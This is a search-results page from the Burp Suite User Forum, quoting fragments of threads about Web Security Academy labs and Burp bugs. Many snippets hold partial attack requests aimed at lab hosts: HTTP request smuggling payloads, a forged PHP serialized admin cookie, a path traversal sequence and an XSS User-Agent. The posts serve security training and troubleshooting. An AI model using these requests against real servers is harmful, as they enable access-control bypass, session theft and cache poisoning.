Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Found 50 posts in 43 threads

Exploiting PHP deserialization with a pre-built gadget chain - getting error

Error: Symfony Version: 4.3.6 PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Thanks

Last updated: Jun 05, 2021 09:01AM UTC | 1 Agent replies | 2 Community replies | How do I?

Incorrect path reported in target sitemap

Hello, I'm testing a website that uses Japanese characters in URL path and I've noticed that in some cases the discovered paths are incorrectly logged in the target sitemap in Burp. rel="stylesheet" href="あ/style.css" />': # mkdir www # echo '<! meta charset="utf-8"><link rel="stylesheet" href="あ/style.css" /></head><body>test</body></html>' > www amd64 os.name Linux os.version 6.8.0-41

Last updated: Sep 05, 2024 10:24AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Modifying serialized data types - Debug dumps tokens

Hey, not sure if this a bug or a feature) So if in cookie you change username to not much token, p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7

Last updated: Aug 20, 2021 02:26PM UTC | 1 Agent replies | 1 Community replies | Bug Reports

HTTP request smuggling, basic TE.CL vulnerability

i did the lab as mentioned in the solution but when i submit the request in repeater it says "bad request i sent: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: May 20, 2020 01:02PM UTC | 1 Agent replies | 1 Community replies | How do I?

HTTP Request Smuggling

I don't understand how the content-length of the smuggler request is calculated in the lab that works as te.cl in request smuggling Can you help me 15 where does it come from? portwigger: POST / HTTP/1.1 Host: your-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 06:44PM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab Login Not Working

HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded zB2ywbNIdngCwKnb9VDN1oh9cfEUBoU5 csrf=rX10ZHqdOj6WbiBu0FPeeuijWtRBjA3t Now my Own session cookie is in HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Jul 10, 2020 08:07AM UTC | 3 Agent replies | 5 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to reveal front-end request rewriting

like you are changing the address from 127.0.0.1 to the IP returned as a result of the request sent in not need to change the IP address, you just need to add the header that is returned from the request in step 3 and give it the value 127.0.0.1 i.e. in the lab attempt I have just carried out, the header returned HTTP/1.1 Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net Content-Type: application/x-www-form-urlencoded username=carlos HTTP/1.1 X-ayZFvQ-Ip: 127.0.0.1 Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Nov 29, 2021 08:07PM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Having similar issues in other labs of this category. HTTP/1.1 Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 71 POST /admin HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded

Last updated: Jan 30, 2020 10:00AM UTC | 3 Agent replies | 2 Community replies | Bug Reports

HTTP Request Smuggling

responses" is given as "POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded server was given as "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded But if the front-end uses TE, shouldn't the part that needs to be sent to the back-end in the first request should be like this: "GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Feb 14, 2022 01:54PM UTC | 1 Agent replies | 0 Community replies | How do I?

PHP deserialization: Signature does not match

kept receiving this error: PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www/index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 My secret key

Last updated: Sep 05, 2023 06:14AM UTC | 1 Agent replies | 1 Community replies | How do I?

Not possible to disable "Update Content-Length"

HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 4 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0 This can be observed in Logger++: POST / HTTP/1.1 Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 105 Transfer-Encoding: chunked 5e POST /404 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0

Last updated: Dec 02, 2022 02:11PM UTC | 3 Agent replies | 3 Community replies | Bug Reports

Lab: Modifying serialized data types

Pasted in this in the cookies by pressing F12 Tzo0OiJVc2VyIjoyOntzOjg6InVzZXJuYW1lIjtzOjEzOiJhZG1pbmlzdHJhdG9yIjtzOjEyOiJhY2Nlc3NfdG9rZW4iO2k6MDt9 Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7" What is it that Thank you in advance! c:

gives the error "PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7" The /admin

Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Can anyone help

Internal Server Error PHP Fatal error: Uncaught Exception: Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7 Can anyone help

36%4d%44%74%39 Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 ??

I decoded the cookie in this sequence: 2x URL + 1x base64, and then I modified the session cookie then gave me this error: Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 Then, what I did is: I added the URL in my browser (Firefox) with \admin and then enter the modified session cookie

"Lab: Modifying serialized objects" PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4 echo "O:4

Last updated: Jul 19, 2023 11:43AM UTC | 8 Agent replies | 15 Community replies | How do I?

Bug in Lab

below error Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4

Last updated: May 25, 2021 01:32PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab 1 Directory traversal(File path traversal, simple case)

218.png) is present 3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www/image/218.png or /var/www/image/abc/218.png, How we get to know this for applying

Last updated: May 06, 2022 09:39AM UTC | 1 Agent replies | 0 Community replies | How do I?

Lab: Arbitrary object injection in PHP

to a burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5

Last updated: Apr 12, 2021 09:19AM UTC | 1 Agent replies | 0 Community replies | How do I?

Different URLs in Target: Request, Raw and Site map URL

I recognized that the URL in Target, Site map is different from the URL in the Request, Raw window. Here is what is shown in the Site map window right above (list of all URLs): https://www. timename=SCALE_USER&time=FF:13:15:06:15:08:10:37&id=WEB87431-20150615083 And here is what I see in id=WEB87431-20150616190 HTTP/1.1 Same with: https://www._something_ com/ - GET - /bp_chart.php?

Last updated: Jun 19, 2015 08:08AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Sort entries in the site map by domain components before hostname

indicating a degree of custom sorting already), it would really make sense to sort all of the servers in www.host1.com www.net2.com www1.host1.com while it would really make more sense to *sort* them in com.host1.www com.host1.www1 com.net2.www even though the hostnames are actually displayed as expected

Last updated: Apr 24, 2024 08:00AM UTC | 4 Agent replies | 3 Community replies | Feature Requests

Missing parameter in HTTP Smuggling request lab

HTTP/1.1 Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 256 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded Montoya&email=carlos%40normal-user.net&website=&comment=test I also tried putting two more blank lines in

Last updated: Jun 29, 2022 02:33PM UTC | 2 Agent replies | 1 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

Why it shows me bad requests in repeater response when i sent this request POST / HTTP/1.1 Host: my lab id Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Nov 18, 2020 11:51AM UTC | 1 Agent replies | 0 Community replies | How do I?

invisible proxy

Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www .2daygeek.com/how-to-add-additional-ip-secondary-ip-in-ubuntu-debian-system/

Last updated: Jun 05, 2019 04:40PM UTC | 3 Agent replies | 2 Community replies | How do I?

Lab - Modifying serialized objects login fuction not working properly?

Dear Support, I think there is a problem with the lab Modifying serialized objects, if i try to log in /var/www/index.php on line 1 PHP Fatal error: require_once(): Failed opening required 'User.php' (include_path :/usr/share/php') in /var/www/index.php on line 1 And I am unable to log in, therefore no request /var/www/index.php on line 1 PHP Fatal error: require_once(): Failed opening required &apos;User.php :/usr/share/php&apos;) in /var/www/index.php on line 1</p> </div> </section

Last updated: Oct 24, 2022 03:46PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: HTTP request smuggling, basic TE.CL vulnerability

Please see below: POST / HTTP/1.1 Host: <lab-ID>.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded The second time you submit this request in Repeater, you should see a 403 Forbidden response along with

Last updated: Aug 07, 2024 06:52AM UTC | 8 Agent replies | 13 Community replies | How do I?

An incorrect example in the "Exploiting HTTP request smuggling" section on the Web Security Academy.

In one of the "Revealing front-end request rewriting" examples, the Content-Length is wrong. Transfer-Encoding: chunked 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded In the above example, the first "Content-Length" is 130 while it should be 135. supposed to be: 0 POST /login HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Jul 21, 2023 07:21AM UTC | 2 Agent replies | 1 Community replies | Bug Reports

Exploiting HTTP request smuggling to capture other users' requests

acc91f4d1faf6485c0b70322000b009b.web-security-academy.net Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU Content-Type: application/x-www-form-urlencoded Transfer-encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Length: 600 Content-Type: application/x-www-form-urlencoded postId=9 Accept-Encoding: gzip, deflate Accept-Language: en-GB,e As you see here, the session cookie in

Last updated: Dec 19, 2022 04:36PM UTC | 7 Agent replies | 8 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

Im getting a 400 and {"error":"Invalid request"} I tried also to switch browser because in the I'll past the request: POST / HTTP/1.1 Host: victimhost Content-Type: application/x-www-form-urlencoded postId=1 HTTP/1.1 Host: exploitserver Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Dec 23, 2021 12:43AM UTC | 4 Agent replies | 5 Community replies | How do I?

Lab: Exploiting HTTP request smuggling to bypass front-end security controls, TE.CL vulnerability

Good morning, The following request in the provided solution did work for me but I don't understand HTTP/1.1 Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 60 POST /admin HTTP/1.1 Content-Type: application/x-www-form-urlencoded POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters) Content-Type: application/x-www-form-urlencoded Thanks in advance for your help. Regards, Luc

Last updated: Aug 17, 2022 02:49PM UTC | 2 Agent replies | 4 Community replies | Burp Extensions

Lab Issues: Exploiting HTTP request smuggling to deliver reflected XSS

The funny thing is that I can trigger the alert function when refreshing the page in my own browser. Exploit: ``` POST / HTTP/1.1 Host: my-lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded postId=5 HTTP/1.1 User-Agent: a"/><script>alert(1)</script> Content-Type: application/x-www-form-urlencoded

Last updated: Jan 27, 2022 12:17PM UTC | 1 Agent replies | 0 Community replies | Bug Reports

HTTP smuggling

In this tutorial there is a Note that says: The "attack" request and the "normal" request should be vulnerabilities: POST /search HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked 7c GET /404 HTTP/1.1 Host: vulnerable-website.com Content-Type: application/x-www-form-urlencoded

Last updated: Mar 03, 2022 04:04PM UTC | 2 Agent replies | 2 Community replies | How do I?

Request Smuggling - Lab does not work

As an illustration, in the laboratory entitled "Exploiting HTTP request smuggling to capture other users HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded HTTP/2 Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net Content-Type: application/x-www-form-urlencoded

For instance, in the lab "https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header HTTP/1.1 Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Apr 24, 2023 06:51AM UTC | 4 Agent replies | 4 Community replies | How do I?

HTTP request smuggling, obfuscating the TE header

POST / HTTP/1.1 Host: my host.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Transfer-encoding: cow 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded

Last updated: Mar 05, 2021 03:32PM UTC | 1 Agent replies | 2 Community replies | How do I?

Lab: HTTP request smuggling, basic TE.CL vulnerability

Can you help me understand one interesting moment in this lab? In this lab, smuggling request will be succesful. document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Type: application/x-www-form-urlencoded postId=9 HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=11 0

Last updated: Sep 26, 2024 05:26PM UTC | 2 Agent replies | 1 Community replies | How do I?

Burp scanner ignores scan configuration exclusion lists

/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1 Host: www..... Connection: close Content-Length: 3002 X-Single-Page-Navigation: true Origin: https://www..... ------WebKitFormBoundarydvPyYQOeLGo0JIKb-- Scanner request (as observed in Flow): ------WebKitFormBoundarydvPyYQOeLGo0JIKb

Last updated: Apr 08, 2020 12:24PM UTC | 3 Agent replies | 2 Community replies | Bug Reports

Burp with VPN in mobile.

Of course it is possible, I am located in F China and have to using obfusted traffic to connect to proxy your PC, then you don't need to f about disgusting thing like port forwarding and windows or firewall, in

Last updated: Aug 20, 2019 10:26AM UTC | 7 Agent replies | 8 Community replies | How do I?

Issue on Burpsuite deployed on Google Cloud i.e. GKE (v1.22.11-gke.400) during Scan. The scan runs infinitely.

getting below Logs repeatedly when running scan and scan runs infinetly textPayload: "2022-09-15 09:41 @6b0facef{/,null,UNAVAILABLE} contextPath ends with /* [r STARTING]" textPayload: "2022-09-15 09:41 o.e.j.server.handler.ContextHandler - Empty contextPath [r STARTING]" textPayload: "2022-09-15 09:41 registered in SERVER runtime does not implement any provider interfaces applicable in the SERVER runtime [r STARTING] textPayload: "2022-09-15 09:41:40 INFO b.b.b.BurpSuiteProInstanceLauncher - Starting

Last updated: Sep 15, 2022 02:55PM UTC | 1 Agent replies | 0 Community replies | How do I?

Modifying serialized objects

me like this - Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www/index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.

Last updated: Apr 06, 2021 03:26PM UTC | 2 Agent replies | 0 Community replies | How do I?

HTTP request Smuggling CL.TE LAB

I'm trying to compare the two requests (mine and the one reported in the lab solution). What I do not understand is the syntax of the request reported in the lab solution : POST / HTTP/ 1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length

Last updated: Jan 18, 2023 10:45AM UTC | 2 Agent replies | 3 Community replies | How do I?

Incorrect Issue Type/Advisory Finding & Remediation

As such, it is recommended to set the header as X-XSS-Protection: 0" Reference https://owasp.org/www-project-secure-headers /#x-xss-protection This issue should be fixed in the app.

Last updated: Jul 28, 2021 08:43AM UTC | 1 Agent replies | 0 Community replies | Bug Reports

Lab: Exploiting HTTP request smuggling to capture other users' requests

HTTP/1.1 Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net Content-Type: application/x-www-form-urlencoded Transfer-Encoding: chunked Content-Length: 251 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded postId=4&name=aa&email=a%40a.com&website=&comment=Testing I can see GET requests being reflected in

Last updated: May 26, 2022 12:16PM UTC | 1 Agent replies | 0 Community replies | How do I?

ca certificate

The URL is http://burp/ - there's no www.

Last updated: Jun 10, 2020 07:32AM UTC | 7 Agent replies | 9 Community replies | Bug Reports

stripping of lab "File path traversal, traversal sequences stripped non-recursively"

Hi With the examples you have given, "/41.jpg" and "../41.jpg" details would be stripped so that you are left with 41.jpg and so the image can be returned. If you used a sequence such as ....//41.jpg, once ../ has been stripped, you would still be left with ../41.jpg which would then look in a different folder and fail to find the image.

Last updated: Aug 16, 2021 03:30PM UTC | 2 Agent replies | 1 Community replies | How do I?

Lab Not Working Properly

This is the request I'm trying in repeater (I tried +500 variations at the time of writing but this is HTTP/1.1 Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net Content-Type: application/x-www-form-urlencoded Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net Content-Type: application/x-www-form-urlencoded alert(document.cookie) page from the exploit server - I can see the "victim" trying the POST request in

Last updated: Sep 22, 2024 11:33PM UTC | 5 Agent replies | 12 Community replies | How do I?

Burp Scaner with form credentials

The application we are using is writting in Java(Spring Boot). The Content-Type is: application/x-www-form-urlencoded

Last updated: Feb 25, 2020 02:53PM UTC | 4 Agent replies | 6 Community replies | How do I?

vulnerable yes or no

POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1 Host: www.---------.com Origin: http://example.com : */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1410 Origin: https://www.--------.com Connection: close Referer: https://www.realself.com

Last updated: Jul 05, 2021 10:20AM UTC | 0 Agent replies | 0 Community replies | How do I?

Search deeper